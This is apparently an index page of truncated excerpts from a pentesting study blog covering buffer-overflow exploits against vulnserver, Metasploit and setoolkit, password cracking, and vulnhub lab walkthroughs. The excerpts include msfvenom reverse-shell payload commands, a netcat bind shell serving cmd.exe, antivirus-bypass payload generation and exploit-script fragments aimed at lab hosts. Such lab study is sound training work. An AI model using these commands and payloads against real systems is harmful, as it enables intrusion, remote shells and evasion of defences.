Client Side Attacks Tool: setoolkit 1. Start setoolkit on Kali Linux. setoolkit 2. Select 1) Social-Engineering Attacks 3. Select 2)Website Attack Vectors. 4. Select 2) Metasploit Browser Exploit Method 5.Select 2)Site Cloner and set the options. 6.S…

 Modifying Shellcode 1. Search “vulnserver exploit code” on the Internet. Find the following website: http://sh3llc0d3r.com/vulnserver-trun-command-buffer-overflow-exploit/ #!/usr/bin/python import socket import os import sys host="192.168.2.135"…

Compiling an Exploit Exercise: samba exploit 1. Search and download the samba exploit source code from Exploit Database. https://www.exploit-db.com/exploits/10 2. Compile the source code. gcc 10.c -o trans2open 3. Use the trans2open tool to exploit t…

Gaining Root with Metasploit Platform: Kali Linux, Kioptrix Level 1 1. Find the IP of Kioptirx nmap 10.0.0.0/24 -n -sP -sn 2. Scan the Kioptrix server and analyst the result. nmap -nvv -Pn- -sSV -p 22,80,111,139,443,1024 --version-intensity 9 -A -oN…

Tool: Metasploit 1. Start the msfconsole tool. msfconsole 2.Search ssh related modules. 3.Use the "auxiliary/scanner/ssh/ssh_login" module and set the options, such as pass_file, rhosts, username. 4. Exploit the target.…

Tools: 3. hydra Hydra v8.9.1 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FIL…

Pre-Exploit Password Attacks Tools: 1. ncrack Ncrack 0.6 ( http://ncrack.org )Usage: ncrack [Options] {target and service specification}TARGET SPECIFICATION: Can pass hostnames, IP addresses, networks, etc. Ex: scanme.nmap.org, microsoft.com/24, 192.…

Antivirus Bypassing Tools: Kali Linux Detection Platform: https://www.virustotal.com/gui/home/upload 1. msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.200 LPORT= -f exe -o shell1.exe 2. msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.200 LPORT…

Java Applet Attacks Download virtual machines from the following website: https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/ 1. Reset the IE Internet Security Level to Medium and Local intranet to Low 2. Add the target url to the excepti…

Finding the Offset 1. Use the Metasploite pattern_create.rb tool to create 5900 characters. /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 5900 2.Write the python test script. The shellcode is copied from the previous step. #!/usr…

SMB Enumeration 1. Set the smb configurations. locate smb.conf vim /etc/samba/smb.conf Insert the global settings to the configuration file. client use spnego = no client ntlmv2 auth = no 2. Enumerate the target computer and find some interestring th…

Installing Kioptrix: Level 1 Download the vm machine form https://www.vulnhub.com/entry/kioptrix-level-1-1,22/. In the Kali Linux: Find the devices in the intranet using the following command: netdiscover -i eth0 Scan the target kioptrix vm through n…

Scanning with Metasploite: 1. Start the Metasploite using msfconsole 2. search modules 3.Choose one of the modules using command:  use + module name 4. Show the module options 5.Set the module options 6. Start the exploit: run or exploit…

Common Tools Google Exploit-DB/Google Hacking DB WHOIS Netcraft theharvester Example: Google search:   site:cnn.com -site:www.cnn.com filetype:pdf More google search syntax canbe found on the site : https://support.google.com/websearch/answer/2466433…

Generating Shellcode & Gaining Root 1.Generate the shellcode on Kali Linux. LHOST is the IP of Kali Linux. msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.XXX LPORT=4444 EXITFUNC=thread -f c -a x86 --platform windows -b "\x00" 2. Write th…

SickOS 1.2 Walkthrough Preparation: Down load the SickOS virtual machines from the following website: https://www.vulnhub.com/entry/sickos-12,144/ 1. Scan the network to find the IP of SickOS server. The IP address of the SickOS is 10.0.0.31. netdisc…

DroopyCTF Walkthrough Preparation: Download the DroopyCTF virtual machine from the following website: https://www.vulnhub.com/entry/droopy-v02,143/ 1. Scan the network to find the IP address of the DroopyCTF server. netdiscover -r 10.0.0.0/ 2. Scan t…

BTRSys v2.1 Walkthrough Preparation: Download the BTRSys virtual machine from the following website: https://www.vulnhub.com/entry/btrsys-v21,196/ 1. Find the IP address of the BTRSys virtual machine. netdiscover -r 10.0.0.0/ 2. Perform the TCP/UDP s…

Kioptrix Level 1.1 Walkthrough Preparation: Download the virtual machine  from the following website: https://www.vulnhub.com/entry/kioptrix-level-11-2,23/ The target server: Kioptirx Level 1.1(#2) 1. Discover the IP address of the target server. We…

Pivoting 1. Edit the virtual network settings of the Vmware. 2. Set the Network Adapter(s) of Kali Linux, IE8-Win7 and Kioptrix Level 1 as showed in the following screenshoots. The Kali Linux should only talk to IE8-Win7 machine, and can not talk to…

Linux Post Exploitation Target Sever: Kioptrix Level 1 1. Search the payloads types. msfvenom -l payloads All the payload type in Metasploit are showing as below: Framework Payloads ( total) [--payload <value>] ======================================…

Privilege Escalation Download the Basic-pentesting vitualmation from the following website: https://www.vulnhub.com/entry/basic-pentesting-1,216/ 1.Scan the target server using nmap. nmap -Pn -sS --stats-every 3m --max-scan-delay --defeat-rst-ratelim…

Metasploit Target Server: Kioptrix Level 1 (1) Start the Metasploit on Kali Linux. (2) Set the module and options. search trans2open use exploit/linux/samba/trans2open set RHOST 10.0.0.13 show options exploit (3)Exploit the Kioptrix Level 1 server.(F…

File transfer type: 1. HTTP Transfer files through the website. 2.wget wget http://10.0.0.109/exploit.php 3.FTP python FTP (1)Install python FTP on the Kali Linux. pip3 install pyftpdlib (2)Move to the target folder, and start the FTP service. python…

Remote File Inclusion[RFI] Prepare: Download the DVWA from the following website and deploy it on your server. http://www.dvwa.co.uk/ Install XAMPP and DVWA: 1. Install XAMPP on Windows server. And change the Apache http port to 82 and ssl port to 44…

Finding Bad Characters 1. Find the bad charaters in the following website: https://bulbsecurity.com/finding-bad-characters-with-immunity-debugger-and-mona-py/ 2. Write the Python test script using the badchars. #!/usr/bin/python import socket import…

Introduction to Buffer Overflows Anatomy of Memory Anatomy of the Stack Fuzzing Tools: Vulnserver - https://github.com/stephenbradshaw/vulnserver Immunity Debuger - https://www.immunityinc.com/products/debugger/ Vulnserver Test 1. Open the vulnserver…

Introduction to Netcat Connecting va Listening Bind Shells Attacker connects to victim on listening port Reverse Shells Victim connects to attacker on listening port Basic usage: nc -nv IP Port Bind Shell: 1.On the Windows nc tool. -nvlp -e cmd.exe 2…

DNS Enumeration 1. Host Tool host is a simple utility for performing DNS lookups. It is normally used to convert names to IP addresses and vice versa. When no arguments or options are given, host prints a short summary of its command line arguments a…

HTTP Enumeration Target Host IP: 10.0.0.20 Brute Forcing using DirBuster 1. Start the dirbuster and set the options. Note: 1. The wordlist can be found locally or downloaded from the Internet. OR  Dirbuster-ng big wordlist dowload site:https://github…